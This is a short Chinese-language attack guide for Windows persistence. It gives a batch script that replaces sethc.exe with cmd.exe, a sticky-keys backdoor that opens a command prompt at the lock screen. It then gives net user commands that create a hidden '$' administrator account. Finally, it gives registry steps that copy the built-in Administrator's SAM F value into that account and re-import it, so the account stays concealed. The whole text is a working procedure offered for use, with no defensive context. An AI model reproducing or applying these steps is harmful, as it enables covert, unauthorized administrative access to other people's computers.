创建替换脚本文件

@echo off
del /q %systemroot%\system32\dllcache\sethc.exe
del /q %systemroot%\system32\sethc.exe
copy %systemroot%\system32\cmd.exe %systemroot%\system32\sethc.exe
copy %systemroot%\system32\cmd.exe %systemroot%\system32\dllcache\sethc.exe

在锁屏界面按5次Shift出现cmd窗口

net user test$ 123 /add         #添加隐藏用户，一定要加$
net user            #查看已有用户
net localgroup administrators test$ /add    #添加用户到用户组
regedit

打开注册表修改相关项

HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\用户名      --->   查看类型

HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\00000类型号

HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4    --->   将F的值复制

替换到新建的隐藏用户的F值中

替换完后将“HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\00000类型号” 和 “HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\用户名” 导出

net user test$ /del

将刚才导出的两个表导入

这样隐藏用户就创建完成了